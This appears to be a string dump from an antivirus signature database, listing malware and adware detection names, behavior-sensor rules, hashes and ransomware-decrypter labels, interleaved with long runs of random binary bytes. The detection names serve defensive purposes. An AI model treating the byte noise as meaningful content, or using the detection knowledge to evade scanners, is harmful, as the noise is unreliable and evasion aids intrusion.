!#HSTR:MSIL/AgentTesla.TR!MTB Kids_vs_IceCream.Form1.resources Kids_vs_IceCream.MDIParent1.resources Kids_vs_IceCream.KeySpec.resources Kids_vs_IceCream.Properties.Resources.resources Kids_vs_IceCream.GameWindow.resources Kids_vs_IceCream.Forms.EnterNameWindow.resources Kids_vs_IceCream.Forms.HighScoreWindow.resources Kids_vs_IceCream.NextLevelWindow.resources Kids_vs_IceCream.GameOverWindow.resources Kids_vs_IceCream.HowToPlayWindow.resources 8686D3F76DE95B4E1C5D0F86E7937E2588B69F423E9A26B0BA870C9DA332B907 8686D3F76DE95B4E1C5D0F86E7937E2588B69F423E9A26B0BA870C9DA332B907x. !#HSTR:Trojan:Win32/C2Lop.gen!N.1 4!#HSTR:Trojan:Win32/C2Lop.gen!N.1 !#Ransom:Win32/Crowti!decrypt Browse button for select folder to search for encrypted files CryptoWall Decrypter !#HSTR:VirTool:Win32/Obfuscator.ALM YQ;t1_ Qj]hfM C!%D> [nYC^ Pr[sq\t +\\5H[ Z_kxc 8s=*C FurW# IU\\yz x7tG6]'S &Agy1 OMc)1 d0FAVbA >ETG hrQ(\\|\t qze53 _I/@# 7u^uL APwRl w;q}Q 3H/$;9 |7i>} mduGk i9 `+U PnyN] .r}H@ QJOKK :z9k! }t;u/J ~jxh] j9!V 5}WU% >Tf{eD C0v\"!> tJ,>e ednz= d>RX> |2+?a5 (IX[T; qOP5\t6= (rka4 ^Df4m ~vs'Mx \\spOv E01H0 UG>Nq ]U;F* Qr~tT g'g\tY X[=z6: /(\"aN] D^X9U ^L5pF iq<;C b_Ns! z\"]}4+ G+`5f *2pu@ a+sf*+i FOP:VirTool:Win32/Obfuscator.Fareit $FOP:VirTool:Win32/Obfuscator.Fareit 2789916b1483 PEBMPAT:Virus:Win32/Xpaj.gen!F fixup_rva key_rva CURE:Virus:Win32/Xpaj.C_%08X_%08X \"CURE:Virus:Win32/Xpaj.C_%08X_%08X 37955eb36b01 145b31061429f 6EF@ 179b3412949a0 179b3412949a0IncludesBMLuaLib 179b3bea337e5 179b3bea337e5IncludesBMLuaLib 179b3ed708fc4 179b3ed708fc4IncludesBMLuaLib !#ALF:Trojan:Win32/RenoFloss.G!dha !#ALF:Exploit:Script/AriffraffJs.A!dha !#ALF:Exploit:Script/AriffraffJs.A!dhaObMpAttributes 42078 SCPT:CodeOnly.AriffraffJs 15b3cf26fc31 2db33bcf0c68 \t:EF@ 65b369cd99b8 75b3fac5cf45 9fb334ba8295 c9b315c851c7 c:\\windows\\system32\\tasks c9b380e1082c c9b38ce04dc8 c9b398e383e4 c9b39ce340b8 cdb3517745d3 f1b3475745df c678f331c9b3 c678f331c9b3Flags1 winsta0 16e78fefdbae9 line_numbers_stripped locals_symbols_stripped 198781a1fa1b7 1f47807cbd97c 1f478f60aafb2 2017818cbc3bc 15b363848631 25b35e056280 25b3ff3fa362 useraccountcontrolsettings.exe 33894b9d9bc9 NE *K _2K1g a[Lzs Q^59 V}sJ'} eWe@a b1c(v#Kt VT:j:q nn:tcJQ> R#/(g) LP|t* YVwg' ^NDzj `.| @P nZb%+ ZyTltm 0~*/wu P;HJ4 \tV+{giE 9k~G-( *pi#a 9U)2(< EaSQv5 SE4n Fo cRa:q ydY#V KH!=l R 0F]b ?m |N T^H,,: -\\.%:g ?q( /5 UHmLG>. 8\t=<u ~//= s !R<Y+C q@:AM S]Ks'. 6&K/C yZ\t-Ik S@'jA aHS@'jA ?]iE$ Z?G)HA& %)><_BG wq26l [-e0+? Qf'[xf 9< 6Z 76C2VK @6|J2 `]}Td {- H} !!c8z OdLhP - TZJ FiU_) I@iE2;`D 7P*7R /sw)MZ Mg;9E gkkiR R>hwQ m7oiD .>J\t# R7MF T S8dav W4Jjy D5W/CEq Me\\HxV aObXp %V1!^ rZW/C J\"(&( 22/1/ g-i*m $yr3b O'^+C ?Yi[UB y??F`( UiA0W $;!C'G( c.,cF }Y&B7 Meg^` _\tT7A )3nh==Kk }Ns]W og +$ (9OE]UC= TptQ?SB') \t*l,g 3*w%g ,Z<]%[#N *h4 Y w %3A wrXe< !w!QgN J}%7Tl, yy%y ;o DiI)s C7a\\u #l}tWD m&/{\" A ;]6_c ^/ajQ B`L {g -1\"x\" ,7tCX j|H}q |a1 # $x*FO :SIGATTR:VoolDownloader :SIGATTR:VoolDownloaderU% :#LOWFI:HSTR:Diplugem_obfuscator :#LOWFI:HSTR:Diplugem_obfuscatorU%. :#LowFi:HSTR:CrossriderFramework :#LowFi:HSTR:CrossriderFrameworkU% Y#Persist:HSTR:MaxigetDownloader Y#Persist:HSTR:MaxigetDownloaderU&m 0,_#Lowfi:Program:Win32/EasySpeedPc 0,_#Lowfi:Program:Win32/EasySpeedPcU& @:#LowFi:HSTR:FourSharedDownloader @:#LowFi:HSTR:FourSharedDownloaderU&\tu :#Lowfi:HSTR:Win32/UnityWebPlayer :#Lowfi:HSTR:Win32/UnityWebPlayerU& :#LowFi:Program:Win32/OutBrowse.B :#LowFi:Program:Win32/OutBrowse.BU&Xw- _#Lowfi:Program:Win32/RegCleanPro _#Lowfi:Program:Win32/RegCleanProU& :#LowFi:Program:Win32/OutBrowse.C :#LowFi:Program:Win32/OutBrowse.CU& _#HSTR:Program:Win32/ProPCCleaner _#HSTR:Program:Win32/ProPCCleanerU' Y#Persist:HSTR::Win32/OInstaller.A Y#Persist:HSTR::Win32/OInstaller.AU' K!Y#PERSIST:HSTR:Win32/MyWebSearch.B K!Y#PERSIST:HSTR:Win32/MyWebSearch.BU' %Y#Persist:SIGATTR:DownloaderHelper %Y#Persist:SIGATTR:DownloaderHelperU' ,_#Lowfi:Program:Win32/SpigotSearch ,_#Lowfi:Program:Win32/SpigotSearchU' 0:#Lowfi:CherishedTechnology:Nation 0:#Lowfi:CherishedTechnology:NationU' 3:#Lowfi:AGGREGATOR:AddLyricsPlugin 3:#Lowfi:AGGREGATOR:AddLyricsPluginU' 8:#Lowfi:LUA:AutoitDummylastSection 8:#Lowfi:LUA:AutoitDummylastSectionU'\tK VY#Persist:HSTR:UnknownSilentLoader VY#Persist:HSTR:UnknownSilentLoaderU' u:#Lowfi:SCRIPT:VBS/PrifouCrypt.A-2 u:#Lowfi:SCRIPT:VBS/PrifouCrypt.A-2U' Y#Persist:SIGATTR:RSPark-OutBrowse Y#Persist:SIGATTR:RSPark-OutBrowseU'J,s :#LowFi:SIGATTR:SoftonicDownloader :#LowFi:SIGATTR:SoftonicDownloaderU'ml Y#Persist:HSTR:XingCloudDownloader Y#Persist:HSTR:XingCloudDownloaderU' Y#Persist:HSTR::Win32/OInstaller.B Y#Persist:HSTR::Win32/OInstaller.BU' :#LowFi:SCRIPT:CrossriderFramework :#LowFi:SCRIPT:CrossriderFrameworkU' :#Lowfi:AGGR:LowerInternetSecurity :#Lowfi:AGGR:LowerInternetSecurityU' :#Lowfi:SCRIPT:VBS/PrifouCrypt.A-1 :#Lowfi:SCRIPT:VBS/PrifouCrypt.A-1U' :#LOWFI:SIG:TD_OptimumInstaller.A1 :#LOWFI:SIG:TD_OptimumInstaller.A1U' _#Lowfi:SIGATTR:LoadFirefoxLibrary _#Lowfi:SIGATTR:LoadFirefoxLibraryU' :#Lowfi:HSTR:Win32/DriverUpdater.B :#Lowfi:HSTR:Win32/DriverUpdater.BU(U :#Lowfi:Lua:Adware:Win32/ZoomyLib.A :#Lowfi:Lua:Adware:Win32/ZoomyLib.AU( _#LowFi:SCPT:Bundler:Win32/Vittalia _#LowFi:SCPT:Bundler:Win32/VittaliaU(! 0_#LowFi:NDAT:Program:Win32/Einstall 0_#LowFi:NDAT:Program:Win32/EinstallU( } 4_#Lowfi:Program:Win32/ConsumerInput } 4_#Lowfi:Program:Win32/ConsumerInputU( @Y#Persist:HSTR:FourSharedDownloader @Y#Persist:HSTR:FourSharedDownloaderU( CSQ_#LowFi:HSTR:Program:Win32/ZeoSpace CSQ_#LowFi:HSTR:Program:Win32/ZeoSpaceU( Y_#Lowfi:Program:Win32/ShopWithBoost Y_#Lowfi:Program:Win32/ShopWithBoostU( <q:#Lowfi:BRUTE:AdwareFevenManifestFf <q:#Lowfi:BRUTE:AdwareFevenManifestFfU( _#LowFi:SIGATTR:Program:Win32/KNCTR _#LowFi:SIGATTR:Program:Win32/KNCTRU(8 _#Lowfi:SIGATTR:UseNetShAdvFirewall _#Lowfi:SIGATTR:UseNetShAdvFirewallU(& _#LowFi:SIGATTR:Program:Win32/Anote _#LowFi:SIGATTR:Program:Win32/AnoteU( :#Lowfi:Lua:Adware:Win32/ZoomyLib.B :#Lowfi:Lua:Adware:Win32/ZoomyLib.BU( _#Lowfi:HSTR:PossibleVBDownloader.A _#Lowfi:HSTR:PossibleVBDownloader.AU( :#LOWFI:HSTR:Adware:Win32/ShouQu.A1 :#LOWFI:HSTR:Adware:Win32/ShouQu.A1U(y :#Lowfi:Lua:Adware:Win32/ZoomyLib.C :#Lowfi:Lua:Adware:Win32/ZoomyLib.CU( :#Lowfi:HSTR:LoadComponentExtension :#Lowfi:HSTR:LoadComponentExtensionU( _#Lowfi:Lua:WrittenToDownloadFolder _#Lowfi:Lua:WrittenToDownloadFolderU) _#Lowfi:SIGATTR:DisableGoogleUpdate1 _#Lowfi:SIGATTR:DisableGoogleUpdate1U) \t9_#Lowfi:Program:Win32/SmartSaverplus \t9_#Lowfi:Program:Win32/SmartSaverplusU) E:#Lowfi:SIGATTR:PossibleDownloader.A E:#Lowfi:SIGATTR:PossibleDownloader.AU) _#Lowfi:HSTR:Program:Win32/PCSpeedUp _#Lowfi:HSTR:Program:Win32/PCSpeedUpU) _#LowFi:SIGATTR:Program:Win32/Kometa _#LowFi:SIGATTR:Program:Win32/KometaU) _#lowfi:HSTR:WinNT/NetFilter2!driver _#lowfi:HSTR:WinNT/NetFilter2!driverU)$ _#Lowfi:SIGATTR:DisableGoogleUpdate2 _#Lowfi:SIGATTR:DisableGoogleUpdate2U)J,s Y#Persist:SIGATTR:SoftonicDownloader Y#Persist:SIGATTR:SoftonicDownloaderU) _#LowFi:HSTR:Program:Win32/Vitruvian _#LowFi:HSTR:Program:Win32/VitruvianU) _#LowFi:HSTR:Program:Win32/Solimba.B _#LowFi:HSTR:Program:Win32/Solimba.BU) _#Lowfi:SIGATTR:DisableGoogleUpdate3 _#Lowfi:SIGATTR:DisableGoogleUpdate3U) Y#PERSIST:HSTR:Win32/DriverUpdater.B Y#PERSIST:HSTR:Win32/DriverUpdater.BU*7J ,:#LowFi:SIGATTR:Program:Win32/Solimba ,:#LowFi:SIGATTR:Program:Win32/SolimbaU*B -_#LowFi:SCPT:Program:Win32/MyPCBackup -_#LowFi:SCPT:Program:Win32/MyPCBackupU*2 :#LowFi:SIGATTR:WritesChromeExtension :#LowFi:SIGATTR:WritesChromeExtensionU* Y#PERSIST:HSTR:WinNT/NetFilter!driver Y#PERSIST:HSTR:WinNT/NetFilter!driverU*{ :#Lowfi:Lua:Program:Win32/OutBrowse.A :#Lowfi:Lua:Program:Win32/OutBrowse.AU* :#LOWFI:HSTR:Trojan:MSIL/Dafterdod.A1 :#LOWFI:HSTR:Trojan:MSIL/Dafterdod.A1U+ :#Behavior:Win32/UncCreateFileSensor.A :#Behavior:Win32/UncCreateFileSensor.AU+^\" !_#LowFi:SCPT:Program:Win32/SpeedUpMyPC !_#LowFi:SCPT:Program:Win32/SpeedUpMyPCU+ `l%:#Lowfi:Win32/YTDownloader!LikelyClean `l%:#Lowfi:Win32/YTDownloader!LikelyCleanU+ ):#Lowfi:SIGATTR:PossibleVBDownloader.A ):#Lowfi:SIGATTR:PossibleVBDownloader.AU+4 U:#LowFi:HSTR:Adware:Win32/Couponarific U:#LowFi:HSTR:Adware:Win32/CouponarificU+ ]:#Lowfi:AGG:Win32/Obfuscator.Cryptra.A ]:#Lowfi:AGG:Win32/Obfuscator.Cryptra.AU+_ j:#Behavior:Win32/UncRenameFileSensor.A j:#Behavior:Win32/UncRenameFileSensor.AU+ :#LOWFI:HSTR:MSIL/CheckVirtualFunction :#LOWFI:HSTR:MSIL/CheckVirtualFunctionU+ :#Behavior:Win32/UncDeleteFileSensor.A :#Behavior:Win32/UncDeleteFileSensor.AU+ :#LOWFI:SIGATTR:Adware:Win32/IWebar.A1 :#LOWFI:SIGATTR:Adware:Win32/IWebar.A1U+ :#Behavior:Win32/UncChangeFileSensor.A :#Behavior:Win32/UncChangeFileSensor.AU+ _#LowFi:SIGATTR:Program:Win32/Einstall _#LowFi:SIGATTR:Program:Win32/EinstallU+ _#LowFi:HSTR:Program:Win32/VitruvianIE _#LowFi:HSTR:Program:Win32/VitruvianIEU+7A _#SIGATTR:Program:Win32/PCOptimizerPro _#SIGATTR:Program:Win32/PCOptimizerProU,&~8 :#LOWFI:SIGATTR:Adware:Win32/BoxRock.A1 :#LOWFI:SIGATTR:Adware:Win32/BoxRock.A1U,`U \t:#Lowfi:AGGREGATOR:Trojan:O97M/Donoff.A \t:#Lowfi:AGGREGATOR:Trojan:O97M/Donoff.AU, _#lowfi:CERT:Adware:Win32/PullUpdate.A2 _#lowfi:CERT:Adware:Win32/PullUpdate.A2U,\t$ :#Lowfi:AGGR:Program:Win32/NSISChecksAV :#Lowfi:AGGR:Program:Win32/NSISChecksAVU, ;:#Lowfi:SIGATTR:ReadHDDIDPossibleAntiVM ;:#Lowfi:SIGATTR:ReadHDDIDPossibleAntiVMU, S_#LowFi:SIGATTR:Program:Win32/BestDeals S_#LowFi:SIGATTR:Program:Win32/BestDealsU,2 Y#Persist:SIGATTR:WritesChromeExtension Y#Persist:SIGATTR:WritesChromeExtensionU,si :#Lowfi:AGGR:Program:Win32/NSISChecksVM :#Lowfi:AGGR:Program:Win32/NSISChecksVMU,Z _#lowfi:CERT:Adware:Win32/PullUpdate.A1 _#lowfi:CERT:Adware:Win32/PullUpdate.A1U, _#lowfi:CERT:Adware:Win32/PullUpdate.A4 _#lowfi:CERT:Adware:Win32/PullUpdate.A4U, _#LowFi:Program:Win32/DownloadAssistant _#LowFi:Program:Win32/DownloadAssistantU,n :#LowFi:SoftwareBundler:Win32/OutBrowse :#LowFi:SoftwareBundler:Win32/OutBrowseU,% _#Lowfi:SIGATTR:Program:Win32/PCSpeedUp _#Lowfi:SIGATTR:Program:Win32/PCSpeedUpU,+95 _#lowfi:CERT:Adware:Win32/PullUpdate.A3 _#lowfi:CERT:Adware:Win32/PullUpdate.A3U,uM :#LOWFI:HSTR:Adware:Win32/CloverPlus.A1 :#LOWFI:HSTR:Adware:Win32/CloverPlus.A1U- :#Lowfi:STATIC:Adware:Win32/CrossRider.C :#Lowfi:STATIC:Adware:Win32/CrossRider.CU- +_#SIGATTR:Program:Win32/AVGSearchProtect +_#SIGATTR:Program:Win32/AVGSearchProtectU-C R:#Lowfi:SIGATTR:PossibleMSILDownloader.A R:#Lowfi:SIGATTR:PossibleMSILDownloader.AU- :#Lowfi:Lua:SuspiciousExeFileInAppdata.B :#Lowfi:Lua:SuspiciousExeFileInAppdata.BU- :#Lowfi:Lua:Program:Win32/OutBrowse!drop :#Lowfi:Lua:Program:Win32/OutBrowse!dropU- :#Lowfi:PUA:BundlerCluster:InstallCore.A :#Lowfi:PUA:BundlerCluster:InstallCore.AU- _#LowFi:HSTR:Program:Win32/BoBrowserInst _#LowFi:HSTR:Program:Win32/BoBrowserInstU-T :#Lowfi:SIGATTR:TrojanSpy:Win32/Delpoa.A :#Lowfi:SIGATTR:TrojanSpy:Win32/Delpoa.AU. 2:#Lowfi:HSTR:Program:Win32/AirInstaller.A 2:#Lowfi:HSTR:Program:Win32/AirInstaller.AU. 8_#HSTR:Program:Win32/SystemMaintenancePro 8_#HSTR:Program:Win32/SystemMaintenanceProU. Q:#Lowfi:HSTR:Program:Win32/UltraDownloads Q:#Lowfi:HSTR:Program:Win32/UltraDownloadsU. _#HSTR:Program:Win32/MalwareProtection360 _#HSTR:Program:Win32/MalwareProtection360U.!o _#LowFi:HSTR:Program:Win32/SaveDailyDeals _#LowFi:HSTR:Program:Win32/SaveDailyDealsU. _#SIGATTR:Program:Win32/AdvanceCleanerPro _#SIGATTR:Program:Win32/AdvanceCleanerProU. _#Lowfi:SCPT:Adware:Win32/InstallMetrix.A _#Lowfi:SCPT:Adware:Win32/InstallMetrix.AU. Y#Persist:Program:Win32/DownloadAssistant Y#Persist:Program:Win32/DownloadAssistantU/ #_#LowFi:NID:Program:Win32/UniversalUpdater #_#LowFi:NID:Program:Win32/UniversalUpdaterU/ Bi6_#Lowfi:SCPT:Adware:Win32/LiveSoftAction.A Bi6_#Lowfi:SCPT:Adware:Win32/LiveSoftAction.AU/ _#Lowfi:SIGATTR:NSIS:ShellExecuteExError.A _#Lowfi:SIGATTR:NSIS:ShellExecuteExError.AU/ _#LowFi:SIGATTR:Program:Win32/CouponMarvel _#LowFi:SIGATTR:Program:Win32/CouponMarvelU/ :#LowFi:HSTR:TrojanDownloader:Win32/Adcurl :#LowFi:HSTR:TrojanDownloader:Win32/AdcurlU/ :#Lowfi:SIGATTR:PossibleDelphiDownloader.A :#Lowfi:SIGATTR:PossibleDelphiDownloader.AU/ _#Lowfi:SIGATTR:Program:Win32/SpigotExtHlp _#Lowfi:SIGATTR:Program:Win32/SpigotExtHlpU/ Y#PERSIST:PUA:BundlerCluster:InstallCore.A Y#PERSIST:PUA:BundlerCluster:InstallCore.AU0 _#Tel_SoftwareBundler:Win32/BetterInstaller _#Tel_SoftwareBundler:Win32/BetterInstallerU0 8:#LowFi:SoftwareBundler:Win32/GoFileExpress 8:#LowFi:SoftwareBundler:Win32/GoFileExpressU0 Y:#LOWFI:HSTR:Program:Win32/Casino_Installer Y:#LOWFI:HSTR:Program:Win32/Casino_InstallerU0 u\\:#LowFi:SoftwareBundler:Win32/GoFileExpress u\\:#LowFi:SoftwareBundler:Win32/GoFileExpressU0 ]_#Tel_SoftwareBundler:Win32/BetterInstaller ]_#Tel_SoftwareBundler:Win32/BetterInstallerU0 :#LOWFI:SIGATTR:Adware:Win32/ElexTechYac.A1 :#LOWFI:SIGATTR:Adware:Win32/ElexTechYac.A1U0 :#LowFi:SoftwareBundler:Win32/GoFileExpress :#LowFi:SoftwareBundler:Win32/GoFileExpressU0 _#Tel_SoftwareBundler:Win32/AstoriInstaller _#Tel_SoftwareBundler:Win32/AstoriInstallerU0 :#LowFi:SoftwareBundler:Win32/DownloadAdmin :#LowFi:SoftwareBundler:Win32/DownloadAdminU1 :#Lowfi:AGGR:Program:Win32/NSISChecksFiddler :#Lowfi:AGGR:Program:Win32/NSISChecksFiddlerU1 ):#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A1 ):#LOWFI:SCPT:Program:Win32/CodecPlayerRKR.A1U1V6 >_#Lowfi:HSTR:BrowserModifier:ConsentBypass.A >_#Lowfi:HSTR:BrowserModifier:ConsentBypass.AU18 F_#LowFi:SIGATTR:Program:Win32/SaveDailyDeals F_#LowFi:SIGATTR:Program:Win32/SaveDailyDealsU1 J:#LOWFI:HSTR:Adware:Win32/ElexTechYacNSIS.A1 J:#LOWFI:HSTR:Adware:Win32/ElexTechYacNSIS.A1U1 W:#LOWFI:AGGR:Program:Win32/CodecPlayerRKR.A0 eycq_#Lowfi:SCPT:Adware:Win32/SupSearchProtect.A W:#LOWFI:AGGR:Program:Win32/CodecPlayerRKR.A0U1eycq_#Lowfi:SCPT:Adware:Win32/SupSearchProtect.AU1` :#LUA:ContextualChangeFileTypeSensor.A!actor :#LUA:ContextualChangeFileTypeSensor.A!actorU1 Y#Persist:HSTR:TrojanDownloader:Win32/Adcurl Y#Persist:HSTR:TrojanDownloader:Win32/AdcurlU1. :#LOWFI:HSTR:Adware:Win32/ElexTechYacNSIS.A2 :#LOWFI:HSTR:Adware:Win32/ElexTechYacNSIS.A2U1 _#LOWFI:Lua:ContextualDropFileSkypeExtScript _#LOWFI:Lua:ContextualDropFileSkypeExtScriptU2 :#Lowfi:CERT:BrowserModifier:Win32/Diplugem.G :#Lowfi:CERT:BrowserModifier:Win32/Diplugem.GU2 :#Lowfi:CERT:BrowserModifier:Win32/Diplugem.C :#Lowfi:CERT:BrowserModifier:Win32/Diplugem.CU2 :#Behavior:Win32/MultiDriveChangeFileSensor.A :#Behavior:Win32/MultiDriveChangeFileSensor.AU2M _#Lowfi:Program:Win32/SpigotBrowserExtensions _#Lowfi:Program:Win32/SpigotBrowserExtensionsU2 :#LowFi:HSTR:TrojanDownloader:Win32/AdStatp.A :#LowFi:HSTR:TrojanDownloader:Win32/AdStatp.AU2 :#LOWFI:SCPT:BrowserModifier:Win32/Sijetso.A2 :#LOWFI:SCPT:BrowserModifier:Win32/Sijetso.A2U2 :#LUA:ContextualChangeFileTypeSensor.A!target :#LUA:ContextualChangeFileTypeSensor.A!targetU2 ':#Lowfi:Lua:SuspiciousExeFileInLocalAppdata.A ':#Lowfi:Lua:SuspiciousExeFileInLocalAppdata.AU2 *:#Lowfi:HSTR:BrowserModifier:Win32/Diplugem.H *:#Lowfi:HSTR:BrowserModifier:Win32/Diplugem.HU2 -_#Lowfi:HSTR:Trojan:Win32/PossibleMultiBanker -_#Lowfi:HSTR:Trojan:Win32/PossibleMultiBankerU2b] 9:#Behavior:Win32/MultiDriveDeleteFileSensor.A 9:#Behavior:Win32/MultiDriveDeleteFileSensor.AU2 W:#LOWFI:HSTR:Program:Win32/AstromendaSearch.A W:#LOWFI:HSTR:Program:Win32/AstromendaSearch.AU2 t:#Lowfi:CERT:BrowserModifier:Win32/Diplugem.F t:#Lowfi:CERT:BrowserModifier:Win32/Diplugem.FU2o :#LOWFI:SCPT:BrowserModifier:Win32/Sijetso.A1 :#LOWFI:SCPT:BrowserModifier:Win32/Sijetso.A1U2 :#Behavior:Win32/MultiDriveCreateFileSensor.A :#Behavior:Win32/MultiDriveCreateFileSensor.AU2h :#Lowfi:HSTR:BrowserModifier:Win32/Diplugem.G :#Lowfi:HSTR:BrowserModifier:Win32/Diplugem.GU2 :#Lowfi:HSTR:BrowserModifier:Win32/Diplugem.F :#Lowfi:HSTR:BrowserModifier:Win32/Diplugem.FU2 :#Behavior:Win32/MultiDriveRenameFileSensor.A :#Behavior:Win32/MultiDriveRenameFileSensor.AU3 r7Q:#LowFi:HSTR:TrojanDownloader:Win32/FakeIE!dll r7Q:#LowFi:HSTR:TrojanDownloader:Win32/FakeIE!dllU3;Z _#Lowfi:MissingWatsonFileTelemetryExperimental _#Lowfi:MissingWatsonFileTelemetryExperimentalU3\" :#LOWFI:HSTR:MSIL/Obfuscator.Eazfuscator.NET.A :#LOWFI:HSTR:MSIL/Obfuscator.Eazfuscator.NET.AU4 Y#PERSIST:CERT:BrowserModifier:Win32/Diplugem.G Y#PERSIST:CERT:BrowserModifier:Win32/Diplugem.GU4 Y#PERSIST:CERT:BrowserModifier:Win32/Diplugem.C Y#PERSIST:CERT:BrowserModifier:Win32/Diplugem.CU4 Y#Persist:HSTR:TrojanDownloader:Win32/AdStatp.A Y#Persist:HSTR:TrojanDownloader:Win32/AdStatp.AU4 _#Lowfi:Program:Win32/DesktopTemperatureMonitor _#Lowfi:Program:Win32/DesktopTemperatureMonitorU4_ :#Lowfi:Lua:SuspiciousStackedExtensionsSensor.B :#Lowfi:Lua:SuspiciousStackedExtensionsSensor.BU4_ N#Lowfi:Lua:SuspiciousStackedExtensionsSensor.B N#Lowfi:Lua:SuspiciousStackedExtensionsSensor.BU4 *Y#PERSIST:HSTR:BrowserModifier:Win32/Diplugem.H *Y#PERSIST:HSTR:BrowserModifier:Win32/Diplugem.HU4 *_#LowFi:HSTR:VirTool:Win32/Obfuscator!AddLyrics *_#LowFi:HSTR:VirTool:Win32/Obfuscator!AddLyricsU4 ,jF:#Lowfi:HSTR:MSIL/Obfuscator.CryptoObfuscator.B ,jF:#Lowfi:HSTR:MSIL/Obfuscator.CryptoObfuscator.BU4 tY#PERSIST:CERT:BrowserModifier:Win32/Diplugem.F tY#PERSIST:CERT:BrowserModifier:Win32/Diplugem.FU4 :#Lowfi:Lua:SuspiciousStackedExtensionsSensor.A :#Lowfi:Lua:SuspiciousStackedExtensionsSensor.AU4h Y#PERSIST:HSTR:BrowserModifier:Win32/Diplugem.G Y#PERSIST:HSTR:BrowserModifier:Win32/Diplugem.GU4 Y#PERSIST:HSTR:BrowserModifier:Win32/Diplugem.F Y#PERSIST:HSTR:BrowserModifier:Win32/Diplugem.FU4qT[ :#LOWFI:SIGATTR:Adware:Win32/ElexTechYacNSIS.A1 :#LOWFI:SIGATTR:Adware:Win32/ElexTechYacNSIS.A1U44 :#Lowfi:AGGR:Program:Win32/NSISChecksDeepFreeze :#Lowfi:AGGR:Program:Win32/NSISChecksDeepFreezeU5 :#Lowfi:SIGATTR:BrowserModifier:Win32/Diplugem.A :#Lowfi:SIGATTR:BrowserModifier:Win32/Diplugem.AU5Q _#LOWFI:Lua:ContextualDropFileSkypeDefaultScript _#LOWFI:Lua:ContextualDropFileSkypeDefaultScriptU5 $:#Lowfi:Lua:SuspiciousExeFileInLocalLowAppdata.A ,$:#Lowfi:Lua:SuspiciousExeFileInLocalLowAppdata.AU5 r7QY#Persist:HSTR:TrojanDownloader:Win32/FakeIE!dll r7QY#Persist:HSTR:TrojanDownloader:Win32/FakeIE!dllU5' :#Lowfi:FOPEX:BrowserModifier:Win32/Prifou.A!upd :#Lowfi:FOPEX:BrowserModifier:Win32/Prifou.A!updU6_ Y#PERSIST:Lua:SuspiciousStackedExtensionsSensor.B Y#PERSIST:Lua:SuspiciousStackedExtensionsSensor.BU6 -P:#LOWFI:HSTR:Websites_Found_Download_Bladabindi_A -P:#LOWFI:HSTR:Websites_Found_Download_Bladabindi_AU6 Y#PERSIST:Lua:SuspiciousStackedExtensionsSensor.A Y#PERSIST:Lua:SuspiciousStackedExtensionsSensor.AU6 :#LOWFI:HSTR:SoftwareBundler:Win32/OfferInstaller :#LOWFI:HSTR:SoftwareBundler:Win32/OfferInstallerU7 Y#PERSIST:SIGATTR:BrowserModifier:Win32/Diplugem.A Y#PERSIST:SIGATTR:BrowserModifier:Win32/Diplugem.AU7 :#Lowfi:PEBMPAT:BrowserModifier:Win32/Prifou.A!upd :#Lowfi:PEBMPAT:BrowserModifier:Win32/Prifou.A!updU7 :#LowFi:HSTR:Adware:Win32/Couponarific!Uninstaller :#LowFi:HSTR:Adware:Win32/Couponarific!UninstallerU7f :#Lowfi:PEBMPAT:BrowserModifier:Win32/Prifou.B!upd :#Lowfi:PEBMPAT:BrowserModifier:Win32/Prifou.B!updU8 :#LOWFI:HSTR:SoftwareBundler:Win32/OgimantMailRU.A1 :#LOWFI:HSTR:SoftwareBundler:Win32/OgimantMailRU.A1U8 :#LOWFI:SCPT:Program:Win32/SuperFishz.A1-CrossRider :#LOWFI:SCPT:Program:Win32/SuperFishz.A1-CrossRiderU8yi F_#Tel_BrowserModifier:Win32/PerionSearchProtectVC32 F_#Tel_BrowserModifier:Win32/PerionSearchProtectVC32U8dv :#LOWFI:SCPT:Program:Win32/SuperFishz.A2-CrossRider :#LOWFI:SCPT:Program:Win32/SuperFishz.A2-CrossRiderU8 _#LOWFI:Lua:ContextualDropFileLyncExtNotcategorized _#LOWFI:Lua:ContextualDropFileLyncExtNotcategorizedU8\t8 _#Tel_BrowserModifier:Win32/PerionSearchProtectVC64 _#Tel_BrowserModifier:Win32/PerionSearchProtectVC64U9H $<_#LOWFI:Lua:ContextualDropFileYahooExtNotcategorized $<_#LOWFI:Lua:ContextualDropFileYahooExtNotcategorizedU9}n u_#LOWFI:Lua:ContextualDropFileSkypeExtNotcategorized u_#LOWFI:Lua:ContextualDropFileSkypeExtNotcategorizedU9l :#LOWFI:SIGATTR:Program:Win32/CrossRiderRandomExt.A1 :#LOWFI:SIGATTR:Program:Win32/CrossRiderRandomExt.A1U; Jk:#LOWFI:HSTR:TrojanDownloader:Win32/VitalliaUpd4ter.A1 Jk:#LOWFI:HSTR:TrojanDownloader:Win32/VitalliaUpd4ter.A1U;A0@ _#LOWFI:Lua:ContextualDropFileOutlookExtNotcategorized _#LOWFI:Lua:ContextualDropFileOutlookExtNotcategorizedU<z :#LOWFI:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A3 :#LOWFI:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A3U< W:#LOWFI:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A2 W:#LOWFI:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A2U<h a_#LOWFI:Lua:ContextualDropFileLyncDefaultNotcategorized a_#LOWFI:Lua:ContextualDropFileLyncDefaultNotcategorizedU<V :#LOWFI:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A1 :#LOWFI:HSTR:SoftwareBundler:Win32/IBryteDownloaderz.A1U=^q _#LOWFI:Lua:ContextualDropFileYahooDefaultNotcategorized _#LOWFI:Lua:ContextualDropFileYahooDefaultNotcategorizedU=k nP_#LOWFI:Lua:ContextualDropFileSkypeDefaultNotcategorized nP_#LOWFI:Lua:ContextualDropFileSkypeDefaultNotcategorizedU? _#LOWFI:Lua:ContextualDropFileOutlookDefaultNotcategorized _#LOWFI:Lua:ContextualDropFileOutlookDefaultNotcategorizedU@H @:#LOWFI:HSTR:Program:Win32/DllSecurityEvader_NotInstallMate @:#LOWFI:HSTR:Program:Win32/DllSecurityEvader_NotInstallMateUC :#LOWFI:SIGATTR:TrojanDownloader:Win32/CrossRiderCinemaxYou.A1 :#LOWFI:SIGATTR:TrojanDownloader:Win32/CrossRiderCinemaxYou.A1[ DCO_MpBmDisableHardLink DCO_MpHeartbeatControlGroup DCO_MpValidateCacheEntries DCO_MpMapsHeartbeatDelay !#TELPER:Win32/PCKeeper $PCKeeper Antivirusl> !#ALFPER:ML:Staged:AutoKMSl> tQrx$5 